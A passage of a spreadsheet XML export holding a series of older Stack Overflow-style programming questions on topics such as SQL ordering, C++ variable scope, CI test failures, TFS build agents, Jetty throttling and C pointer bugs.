&lt;p&gt;Hope this can help someone! Please let me know if it does. And also, please provide some feedback if there is anything you think could be done better or something. I would like to learn =)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ORM or something to handle SQL tables with an order column efficiently</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I got an Java application using SQL tables that contains an ordered list of entities, ordered by
an order column. I would like to add/remove things in/from the middle
of the list. Now, I'm wondering if some persistence framework / orm / you-name-it 
could provide this kind of functionality with batch update of order
column. &lt;/p&gt;
&lt;p&gt;At the basic case Hibernate (and probably others also) provide this
functionality. 
The problem is that the objects are handled one at time, which becomes
problem when the list is large enough. Alternate solution would be to
do the thing with a batch SQL update, like the following for example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;UPDATE table SET order_col = order_col + 1 WHERE order_col &amp;gt; 47
INSERT TO table VALUES ('new_id', 'new_description, ..., 47)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;which is done quite fast by the database engine but isn't supported. &lt;/p&gt;
&lt;p&gt;Now, I understand that this
kind of batch updates don't fit so well when thinking the objects and their
versioning, dirty checking etc.
I'd still ask if somebody has some nice ideas or if some persistence
framework / ORM / you-name-it would provide some help. 
Of course I can do the thing with custom SQL/HQL/... but was wondering
if there would be some solution already (I'd think somebody else could
have done something like this before and even put it under open source). Also other good ideas related to the problem are welcome =)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I keep variables from being re-initialized every time I call a C++ function?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I get past this variable initialization problem? If I only could figure out how to only initialize them only once...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;*   Main.cpp : main project file.
/**************************   Begin Header **************************/
#include "stdafx.h" //Required by Visual C ++
#include &amp;lt;string&amp;gt;   //Required to use strings
#include &amp;lt;iostream&amp;gt; //Required for a bunch of important things
#include &amp;lt;iomanip&amp;gt;  //Required for manipulation of text and numbers
using namespace System; // Automatically uses System namespace
using namespace std;    // Automatically uses std namespace
#pragma hdrstop // Stops header here
/***************************  End Header ***************************/
//* Begin Function Headers *//
void inputData(); // This will be used to organize class member calls when setting and getting new data.
int getData(); // Will get user data, input in character string, convert to an integer and then perform data validation.
void createReport(int place, int number, string type); // Will organize commands to create the report and display it on the screen.
//* End Function Headers *//
class JarsSold // Begin Class -- JarsSold
{
    /* Begin Initialization &amp;amp; Creation of important resources */
private:
    static const int MaxArray = 5; // Value for the size of array JARS_SOLD
    int JARS_SOLD[MaxArray]; // Creation of array with size of MaxArray
    /* End Initialization &amp;amp; Creation of important resources */
public: // Makes underlining elements Public instead of the default Private
    JarsSold() // Begin Constructor
    { // Put something in num array
      JARS_SOLD[0] = 0; // [1]
      JARS_SOLD[1] = 0; // [2]
      JARS_SOLD[2] = 0; // [3]
      JARS_SOLD[3] = 0; // [4]
      JARS_SOLD[4] = 0; // [5] 
    } // End Constructor
    ~JarsSold(){}; // Destructor
/* Put all members for JarsSold class below here */
    void setNumber(int num, int value) // Set the number of jars sold with number placement in array and value to replace it with
    {
        JARS_SOLD[num] = value; // Stores value into JARS_SOLD at whatever num is at the time
    }; // End setNumber class member
    int getNumber(int num) // Get the current number held for jars sold with number placement in array
    {
        return JARS_SOLD[num]; // Returns whatever is in JARS_SOLD depending on what num is at the time
    } // End getNumber class member
/* Put all members for JarsSold class above here */
}; // End Class -- JarsSold
class SalsaTypes // Begin Class -- SalsaTypes
{
    /* Begin Initialization &amp;amp; Creation of important resources */
private:
    static const int MaxArray = 5; // Value for the size of array JARS_SOLD
    string SALSA_TYPES[MaxArray]; // Creation of array with size of MaxArray
    /* End Initialization &amp;amp; Creation of important resources */
public: // Makes underlining elements public instead of the default Private
    SalsaTypes() // Begin Constructor
    { // Add default strings to str array
      SALSA_TYPES[0] = "Mild";   // [1] Stores Mild into SALSA_TYPES at 0 spot
      SALSA_TYPES[1] = "Medium"; // [2] Stores Medium into SALSA_TYPES at 1 spot
      SALSA_TYPES[2] = "Sweet";  // [3] Stores Sweet into SALSA_TYPES at 2 spot
      SALSA_TYPES[3] = "Hot";    // [4] Stores Hot into SALSA_TYPES at 3 spot
      SALSA_TYPES[4] = "Zesty";  // [5] Stores Zesty into SALSA_TYPES at 4 spot
    } // End Constructor
    ~SalsaTypes(){}; // Destructor
/* Put all members for SalsaTypes class below here */
    void setType(int num, string type) // Set salsa type with number placement in array and string value to replace with
    {
        SALSA_TYPES[num] = type; // Stores the string type into SALSA_TYPES at whatever num is at the time
    }; // End setType class member
    string getType(int num) // Get the Salsa Type with number placement in array
    {
        return SALSA_TYPES[num]; // Returns SALSA_TYPES depending on what is in num at the time
    }; // End getType class member
/* Put all members for SalsaTypes class above here */
};// End Class -- SalsaTypes
void main( void ) // Begin Main Program
{
cout &amp;lt;&amp;lt; fixed &amp;lt;&amp;lt; setprecision(1) &amp;lt;&amp;lt; setw(2); // Do a little customization with IoManip, might as well, we just might need it
    // Main Program Contents Begin Here //
    // Opening Credits for Program
    cout &amp;lt;&amp;lt; "Welcome to the /Professional Edition\\ of the Chip and Salsa Sale Tool EXPRESS." &amp;lt;&amp;lt; endl;
    cout &amp;lt;&amp;lt; "This handy-dandy tool will make a chip and salsa manufacturer's job much easier!" &amp;lt;&amp;lt; endl;
    cout &amp;lt;&amp;lt; endl &amp;lt;&amp;lt; endl &amp;lt;&amp;lt; endl;
    cout &amp;lt;&amp;lt; "Press any key to begin inputing the number of jars sold for these salsa flavors: " &amp;lt;&amp;lt; endl &amp;lt;&amp;lt; endl;
    cout &amp;lt;&amp;lt; "-Mild" &amp;lt;&amp;lt; endl &amp;lt;&amp;lt; "-Medium" &amp;lt;&amp;lt; endl&amp;lt;&amp;lt; "-Sweet" &amp;lt;&amp;lt; endl &amp;lt;&amp;lt; "-Hot" &amp;lt;&amp;lt; endl &amp;lt;&amp;lt; "-Zesty" &amp;lt;&amp;lt; endl &amp;lt;&amp;lt; endl &amp;lt;&amp;lt; endl;
    system("pause"); // Pause here. After this begin data input
    cout &amp;lt;&amp;lt; endl &amp;lt;&amp;lt; endl &amp;lt;&amp;lt; endl;
    inputData(); // Will deal with data input, validation, and reports
    // Main Program Contents End Here //
} //End Main Program
// All Content for Functions Begin Here //
void inputData() // Begin inputData Function
{
    // Begin Create Class Obects //
    SalsaTypes salsa;
    JarsSold jars;
    // End Create Class Objects //
    // Variable Creation Begin //
    // Variable Creation End //
    // All Content for Functions Begin Here //
    for (int i = 0 ; i &amp;lt; 5 ; i++) // Start For Loop
    {
        cout &amp;lt;&amp;lt; "Input how many Jars were sold for \"" &amp;lt;&amp;lt; salsa.getType(i) &amp;lt;&amp;lt; "\"" &amp;lt;&amp;lt; ": "; // Displays which Salsa we are reffering to
        jars.setNumber(i,getData()); // Will use getData() to determine what value to send to the JarsSold class.
        createReport(i,jars.getNumber(i),salsa.getType(i)); // Send these numbers to another function so it can make a report later
        cout &amp;lt;&amp;lt; endl &amp;lt;&amp;lt; endl; // Using this as a spacer
    }
    // All Content for Functions End Here //
}; // End inputData Function
int getData() // Begin getData Function
{
    // Variable Creation Begin //
    char charData[40]; // Will be used to store user data entry
    int numTest; // Will be used for Data Validation methods
    // Variable Creation End //
    // Main Contents of Function Begin Here //
retry: // Locator for goto command
    cin &amp;gt;&amp;gt; charData; // Ask user for input. Will store in character string then convert to an integer for data validation using 'Atoi'
    numTest = atoi ( charData ); // Convert charData to integer and store in numTest
    if (numTest &amp;lt; 0) { numTest = 0; cout &amp;lt;&amp;lt; endl &amp;lt;&amp;lt; endl &amp;lt;&amp;lt; "You can't enter negative numbers! Try Again." &amp;lt;&amp;lt; endl &amp;lt;&amp;lt; endl &amp;lt;&amp;lt; "Re-enter number: "; goto retry;} // Filter out negative numbers
    // Main Contents of Function End Here //
    return numTest; // If it makes it this far, it passed all the tests. Send this value back.
}; // End getData Function
void createReport(int place, int number, string type) // Begin createReport Function
{
    // Variable Creation Begin //
    int const MAX = 5;  // Creat array size variable
    int lowest; // The integer it will use to store the place of the lowest jar sales in the array
    int highest; // The integer it will use to store the place of the highest jar sales in the array
    int total; // The integer it will use to store total sales
    int numArray[MAX];  // Create array to store jar sales (integers)
    string typeArray[MAX];  // Create array to store types of salsa (strings)
    // Variable Creation End //
    // Main Contents of Function Begin Here //
    numArray[place] = number; // Store number into new array
    typeArray[place] = type;    // Store type into new array
    if (place = 4) // If the array is full it means we are done getting data and it is time to make the report.
    { // Begin making report, If statement start
        for ( int i = 0 ; i &amp;lt; 5 ; i++ ) // Using a for-loop to find the highest and lowest value in the array
        { // For Loop to find high and low values BEGIN
            if ( lowest &amp;lt; numArray[i]) // Keep setting lowest to the lowest value until it finds the lowest one
            { // Start If
            lowest = numArray[i]; // Lowest equals whatever is in numArray at i spot
            } // End If
            if ( highest &amp;gt; numArray[i]) // Keep setting highest to the highest value until it finds the highest one
            { // Start If
            highest = numArray[i]; // Highest equals whatever is in numArray at i spot
            } // End If
            total += numArray[i]; // Will continually add numArray at i spot until it has the total sales
        } // For Loop to find high and low values END
    // Main Contents of Function End Here //
} // END creatReport Function
// All Content for Functions Ends Here //
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Well my problem is...I need to get my data across from one function to another. I thought I could figure out how to create Global Class Objects but I couldn't. So I thought I could get around just passing the arguments to another function and then restoring them in its own arrays and then keep doing that until i've completely copied all number arrays and string arrays. Well...yeah that does work EXCEPT this part in createReport():&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// Variable Creation Begin //
    int const MAX = 5;  // Create array size variable
    int lowest; // The integer it will use to store the place of the lowest jar sales in the array
    int highest; // The integer it will use to store the place of the highest jar sales in the array
    int total; // The integer it will use to store total sales
    int numArray[MAX];  // Create array to store jar sales (integers)
    string typeArray[MAX];  // Create array to store types of salsa (strings)
// Variable Creation End //
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What happens is, I guess I am so tired that I missed it, every time I call that function it re-initializes those same variables again. I will put variables into another variable and then it will get re-initialized to default values.&lt;/p&gt;
&lt;p&gt;I tried using a counter variable that counted to one after it initialized and then after it was 1 it wouldnt initialize again. No that didn't work because the variables werent initialized outside the scope of the if statement. I then tried a GOTO statement that would skip the initialization after it happened once. Nope something went wrong with the first initialization phase and no compilation.&lt;/p&gt;
&lt;p&gt;I need to figure out how I can either &lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;keep those variables from getting re-assigned or initialized so they can maintain their values. Or &lt;/li&gt;
&lt;li&gt;figure out how to create global class objects (and yes I've tried the extern classes with multiple source files. No luck just lots of errors)&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;I'm not very good at programming yet. But I assure you I've been working on this piece for hours and hours and hours and I stayed up all night just constantly trial and error. I really proud of myself because this code is pretty advanced for me. I've looked at every tutorial on Google and I'm fresh out of luck -- you guys are my last hope!! Sorry again guys. I know this is a dumb question...&lt;/p&gt;
&lt;p&gt;One last quick question. How do you create Global Class Objects? For example&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;MyClass
{
  MyClass(){};
  ~MyClass(){};
}
MyClass MyClassObject;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How do I use MyClassObject throughout my entire program?&lt;/p&gt;
&lt;p&gt;The only way I can use it is if I create a new object every time with every function I use. And that means I lose all data stored inside my class?&lt;/p&gt;
&lt;p&gt;I've read that having global object isn't a good idea though. I would love to not have to use them but I have no clue on any alternatives that I can actually understand.&lt;/p&gt;
&lt;p&gt;Any other critiques or tips is GREATLY appreciated. I love this stuff I just don't have many people to ask questions to.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Should failing tests make the continuous build fail?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If one has a project that has tests that are executed as part of the build procedure on a build machine, if a set tests fail, should the entire build fail?&lt;br /&gt;
What are the things one should consider when answering that question?  Does it matter which tests are failing?&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;Background information that prompted this question:&lt;/p&gt;
&lt;p&gt;Currently I am working on a project that has &lt;a href="http://www.nunit.org/"&gt;NUnit&lt;/a&gt; tests that are done as part of the build procedure and are executed on our &lt;a href="http://ccnet.thoughtworks.com/"&gt;cruise control .net&lt;/a&gt; build machine.&lt;/p&gt;
&lt;p&gt;The project used to be setup so that if any tests fail, the build fails.  The reasoning being if the tests fail, that means the product is not working/not complete/it is a failure of a project, and hence the build should fail.&lt;/p&gt;
&lt;p&gt;We have added some tests that although they fail, they are not crucial to the project (see below for more details).  So if those tests fail, the project is not a complete failure, and we would still want it to build.&lt;/p&gt;
&lt;p&gt;One of the tests that passes verifies that incorrect arguments result in an exception, but the test does not pass is the one that checks that all the allowed arguments do &lt;em&gt;not&lt;/em&gt; result in an exception.  So the class rejects all invalid cases, but also some valid ones.  This is not a problem for the project, since the rejected valid arguments are fringe cases, on which the application will not rely.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>TFS build agent, same port as team server?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My team foundation is setup to use port 8080, when I am creating a new build agent it defaults to port 9191.&lt;/p&gt;
&lt;p&gt;Which one should I use?&lt;/p&gt;
&lt;p&gt;I am getting an error when I try and run my build, it says the build agent was unreachable.&lt;/p&gt;
&lt;p&gt;I created a share on my drive c:\tfsbuilds, and I added the TFSService account and gave it full rights.&lt;/p&gt;
&lt;p&gt;I am using the \computername\tfsbuilds as my path to the builds folder.&lt;/p&gt;
&lt;p&gt;What else could be wrong?&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Error message&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;Team Foundation Build on computer TFSBUILDS.MyServer1.local (port 9191) is not responding. (Detail Message: Unable to connect to the remote server)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL Server - Transactional Replication (partial data only)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have 6 months of data, how do I replicate only the most current 3 months of data to the subscribers?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can we write a sub function or procedure inside another stored procedure - SQL Server</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to check if SQL Server(2000/05/08) has the ability to write a nested stored procedure, what I meant is - WRITING a Sub Function/procedure inside another stored procedure. NOT calling another SP. &lt;/p&gt;
&lt;p&gt;Why I was thinking about it is- One of my SP is having a repeated lines of code and that is specific to only this SP.So if we have this nested SP feature then I can declare another sub/local procedure inside my main SP and put all the repeating lines in that. and I can call that local sp in my main SP. I remember such feature is available in Oracle SPs.&lt;/p&gt;
&lt;p&gt;If SQL server is also having this feature, can someone please explain some more details about it or provide a link where I can find documentation.&lt;/p&gt;
&lt;p&gt;Thanks in advance
Sai&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to use a ThrottlingFilter for Jetty in Restlet</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to configure a webservice so that once the accept queue is full the service returns 503. Currently, these requests seem to just time out. &lt;/p&gt;
&lt;p&gt;I did set paramters like &lt;strong&gt;maxThreads&lt;/strong&gt; and &lt;strong&gt;acceptQueuesize&lt;/strong&gt; (as described here: &lt;a href="http://www.restlet.org/documentation/1.1/ext/com/noelios/restlet/ext/jetty/JettyServerHelper" rel="nofollow"&gt;http://www.restlet.org/documentation/1.1/ext/com/noelios/restlet/ext/jetty/JettyServerHelper&lt;/a&gt;).&lt;/p&gt;
&lt;p&gt;But the service does not respond with 503 once the acceptQueue is full.&lt;/p&gt;
&lt;p&gt;It seems jetty's ThrottlingFilter (&lt;a href="http://www.mortbay.org/jetty/jetty-6/apidocs/index.html?index-all.html" rel="nofollow"&gt;http://www.mortbay.org/jetty/jetty-6/apidocs/index.html?index-all.html&lt;/a&gt;) is what I'm looking for, but I don't know how to apply within my restlet service.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SMTP server that saves all mail to a folder?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Are there any free SMTP servers that just accept the mail sent through them, and save it to your hard disk, without sending it to the recipient.  I would like to use this for  testing my applications.  Instead of just waiting around for the mail to go through, it would be nice if all emails could just be dropped in a folder, so that I can look at them.  I could put some hooks into my program to just save instead of sending the message, but I don't think it's a full test, if the code follows a different path.  Are there any existing applications like this? &lt;/p&gt;
&lt;p&gt;I figure this would be really helpful, because you could test the mail abilities without needing to wait for the mail server to deliver it, and so that you can code while you're offline, and don't have access to an actual mail server.&lt;/p&gt;
&lt;p&gt;[EDIT]&lt;/p&gt;
&lt;p&gt;I'm specifically using .Net, but I'm not using the default SMTP mail handling classes in .Net, because of how limited they were in .Net 1.1.  We are using a third party library (chilkat).  I know that things have changed since then, but the code is stable and works, so no point in rewriting against the .Net API now.  &lt;/p&gt;
&lt;p&gt;I would like something that works as an SMTP server specifically because I could use it in the future for whatever projects I worked on, no matter the language.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I write a value to the registry on a Windows Mobile 5 device?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a string value that I want to write to the registry as a Dword to read via another program. How can i create a new key/string using c# .net?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best way to Implement a MySQL Hash Table?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;strong&gt;Background&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I'm currently developing an online community and I want to store some temporary information in a hash table. Currently this information is being stored in memcached, however, should the memcached service need to be restarted or failed, I would like to resort back to the on disk hash/cache.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The Question&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;What is the most effective method of implementing an on disk Hash or Cache table in MySql? Are there any techniques that I can use to get out of a simple table which will have the following fields:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Hash Value&lt;/li&gt;
&lt;li&gt;Stored Value&lt;/li&gt;
&lt;li&gt;Expiry Date&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Any help or insight would be much appreciated.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Clarity&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;I won't be storing any complex data objects, just simple text strings.&lt;/li&gt;
&lt;li&gt;My current plan is to implement an InnoDB table.&lt;/li&gt;
&lt;li&gt;Any links to articles on a similar topic would be a bonus.&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>Remove server.policy from sun application server</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I encounter &lt;code&gt;java.lang.StackOverflowError&lt;/code&gt; error after deployment of the java web application (&lt;code&gt;.war&lt;/code&gt;). If I remove the &lt;code&gt;server.policy&lt;/code&gt; file. I will not encounter this error however it means that there will be no security. I realize that the error will occur if I include the following in &lt;code&gt;server.policy&lt;/code&gt; which by default is included permission &lt;code&gt;java.lang.RuntimePermission&lt;/code&gt; - &lt;code&gt;modifyThreadGroup&lt;/code&gt;;&lt;/p&gt;
&lt;p&gt;If inside the &lt;code&gt;server.policy&lt;/code&gt; file I just remove this permission &lt;code&gt;java.lang.RuntimePermission&lt;/code&gt;  - &lt;code&gt;modifyThreadGroup&lt;/code&gt;;&lt;/p&gt;
&lt;p&gt;I will get access denied as by default the security manager will check for this permission.&lt;/p&gt;
&lt;p&gt;Anyone have any idea what is wrong and how do I resolve this?&lt;/p&gt;
&lt;p&gt;&lt;code&gt;java.lang.StackOverflowError&lt;/code&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Should I use Top(1) in a SubQuery</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Example Query:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;select * 
from A join B on A.ID = B.SOMEVALUE
where A.VALUE="something" and
B.ID = 
       (select ID from B where SOMEVALUE = A.ID and 
              THISDATE = (select max(SOMEDATE) from B where ...))
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;so, if you can read SQL you should see that I am doing a couple correlated subqueries to narrow down the results of the join . (and yes, this is horribly over-simplified).&lt;/p&gt;
&lt;p&gt;In certain cases the subquery:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;select ID from B where SOMEVALUE = A.ID and 
    THISDATE = (select max(SOMEDATE) from B where ...)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;can return more than 1 value, which causes an error &lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;"Subquery returned more than 1 value.
  This is not permitted when the
  subquery follows =, !=, &amp;lt;, &amp;lt;= , &gt;, &gt;=
  or when the subquery is used as an
  expression."&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;which I fully expect.  This is obviously not a good thing and I have code in place to (hopefully) prevent these duplicates from getting into the database in the first place (ie table B &lt;em&gt;should&lt;/em&gt; only have 1 row that matches the &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SOMEVALUE = A.ID and max(SOMEDATE)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;criteria), however end-users are nothing if not creative in finding ways I can't think of to break software.&lt;/p&gt;
&lt;p&gt;So now to my question:&lt;/p&gt;
&lt;p&gt;Would it be better to change the first subquery to &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;select top 1 * from B ...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;to prevent the user from seeing an error when/if (hopefully never) this situation arises or let the error come through.  I'm leaning to not adding the top statement and letting the error come through rather then let the user see potentially incorrect data.  I'm wondering if anyone has any thoughts on Best Practices in a situation like this...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>AOP for third-party classes</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have used AOP within spring with no real problems, mainly for transaction management, for which it works a charm. &lt;/p&gt;
&lt;p&gt;My question is this... the only examples I've seen for AOP so far is to pointcut a class that you have created yourself. Is it possible to pointcut a class within a third party library, for example a database connection class. The context is that I wish to create some logs and gather information when an oracle data source executes a call to the database, which is unfortunately contained within a stack of oracle class files. How would you pointcut this class/method when the SQL is executed?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MSDN C# ProcessController Sample</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've found this MSDN article that explains how to monitor processes and services with C#:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://msdn.microsoft.com/en-us/library/aa645519(VS.71).aspx" rel="nofollow"&gt;ProcessController Sample: Demonstrates Processes and Services Monitoring&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;However, I can't download or find this sample anywhere! And it would be really helpful.&lt;/p&gt;
&lt;p&gt;Can somebody help me?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Help with custom getline() function</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can anyone explain to me why this isn't working?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;stdlib.h&amp;gt;
char *getline(int lim)
{
    char c;
    int i;
    char *line;
    line = malloc(sizeof(char) * lim);
    i = 0;
    while((c = getchar()) != '\n' &amp;amp;&amp;amp; c != EOF &amp;amp;&amp;amp; i &amp;lt; lim-1)
    {
        *line = c;
        line++;
        i++;
    }
    *line = '\0';
    printf("%s", line);
    return line;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm not worried about the return value right now - just the reason as to why &lt;code&gt;printf("%s", line)&lt;/code&gt; isn't working.&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt; fixed to &lt;code&gt;line = malloc(sizeof(char) * lim);&lt;/code&gt; but it is still not working.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Solution:&lt;/strong&gt; the address of &lt;code&gt;*line&lt;/code&gt; was being incremented throughout the function. When it was passed to &lt;code&gt;printf()&lt;/code&gt;, &lt;code&gt;*line&lt;/code&gt; pointed to '\0' because that's where its adress was incremented to. Using a temprorary pointer that stored the original address allocated by &lt;code&gt;malloc()&lt;/code&gt; to &lt;code&gt;*line&lt;/code&gt; and then passing that pointer into &lt;code&gt;printf()&lt;/code&gt;, allowed for the function to walk up the pointer.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Minimal hosted bug tracking</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We are a small businesses with limited time to do this ourselves.&lt;br&gt;
Can anyone recommend a good (cheap, preferably) hosted solution for simple bug tracking?&lt;br&gt;
Right now we have three products that needs bugtracking.&lt;/p&gt;
&lt;p&gt;All we need is&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Allow customers to submit bugs&lt;/li&gt;
&lt;li&gt;Assign bug&lt;/li&gt;
&lt;li&gt;Show status of bug&lt;/li&gt;
&lt;li&gt;Automatic send email to customer when bug status is changed/resolved/closed (if requested)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Besides that a small wiki/project would be nice.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C# - Get Field Types</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In a C# 2.0 I have a list of fields and a list of values (stored as strings), a table name, and an ODBC Connection.  &lt;/p&gt;
&lt;p&gt;I need to get the data types of the fields that are on that table, so I know how to generate my sql.&lt;/p&gt;
&lt;p&gt;What's the best way to get that information from what I've got?&lt;/p&gt;
&lt;p&gt;My only idea is to do a &lt;code&gt;SELECT TOP 0 * FROM @TableName&lt;/code&gt; in a data adapter, get back a dataset, and iterate through the list of field names against the datacolumn's in the datatable.&lt;/p&gt;
&lt;p&gt;Is there any better way to go about this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C++ virtual function from constructor</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;strong&gt;Why the following example prints "0" and what must change for it to print "1" as I expected ?&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#include &amp;lt;iostream&amp;gt;
struct base {
   virtual const int value() const {
      return 0;
   }
   base() {
      std::cout &amp;lt;&amp;lt; value() &amp;lt;&amp;lt; std::endl;
   }
   virtual ~base() {}
};
struct derived : public base {
   virtual const int value() const {
      return 1;
   }
};
int main(void) {
   derived example;
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Paging &amp; Sorting grids with ASP.Net MVC</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm new to MVC, and am not following how you'd do paging and sorting on a grid.  I'm used to using the asp.Net GridView control with an ObjectDataSource pointed at objects in our business layer - and in that case the ODS handles all of the paging &amp;amp; sorting using the methods that our ORM generates on the objects.&lt;/p&gt;
&lt;p&gt;I've looked at using the same ORM with MVC - and things work out fine there - i just loop thru the collections to build the table on the page - but without the ODS to handle the paging &amp;amp; sorting, i'm confused as to how I'd handle that.  Would I have a separate controller for the paging and sorting? &lt;/p&gt;
&lt;p&gt;I understand that I need to roll my own - but where do I start?  I've created a CustomerController, and a view that displays a table of customers that looks like below - and I want to sort on FirstName or LastName columns.  My Model has a Sort() method on it that'll take a string sort expression in the format that would be used by a GridView/ODS pair.  Would I create a new Action on my CustomerController called Sort, and put an ActionLink in my header?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    &amp;lt;table&amp;gt;
    &amp;lt;tr&amp;gt;
        &amp;lt;th&amp;gt;
            First Name
        &amp;lt;/th&amp;gt;
        &amp;lt;th&amp;gt;
            Last Name
        &amp;lt;/th&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;% foreach (var item in Model)
       { %&amp;gt;
    &amp;lt;tr&amp;gt;
        &amp;lt;td&amp;gt;
            &amp;lt;%= Html.Encode(item.FirstName) %&amp;gt;
        &amp;lt;/td&amp;gt;
        &amp;lt;td&amp;gt;
            &amp;lt;%= Html.Encode(item.LastName) %&amp;gt;
        &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;% } %&amp;gt;
&amp;lt;/table&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Where to put using statements in a C# .cs file</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;strong&gt;DUPE: &lt;a href="http://stackoverflow.com/questions/125319/should-usings-be-inside-or-outside-the-namespace"&gt;http://stackoverflow.com/questions/125319/should-usings-be-inside-or-outside-the-namespace&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;If I add a new class using Visual Studio to the project, It adds all the using statements before namespace but for the same project, FxCop says that put the name spaces inside namespace. Which is a better style of coding?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>is there an alternative to the Internet Developer Toolbar for IE7?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone know of an alternative to the &lt;strong&gt;&lt;a href="http://www.microsoft.com/downloads/details.aspx?familyid=E59C3964-672D-4511-BB3E-2D5E1DB91038&amp;amp;displaylang=en" rel="nofollow"&gt;Internet Developer Toolbar&lt;/a&gt;&lt;/strong&gt; for IE7 that I can use for dom browsing and css debugging? I've used Firebug in the past and the IDT seemed anemic in comparison. It also seemed to crash my browser a lot. &lt;/p&gt;
&lt;p&gt;OR: Has the IDT for IE7 improved to the point that it's almost as good as Firebug? &lt;/p&gt;
&lt;p&gt;Update: shortly after writing this I started using the Developer Toolbar. Well, that's a strong term. I &lt;em&gt;tried&lt;/em&gt; to use it. It's not working at all. Specifically I needed Select Element By Click and it won't do a damn thing. All the menu options are grayed out even after restarting IE7. Good thing I asked this question, looks like the IDT is just as buggy as I remember. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Refresh NSTableView After Click - Not Refreshing</t>
  </si>
  <si>
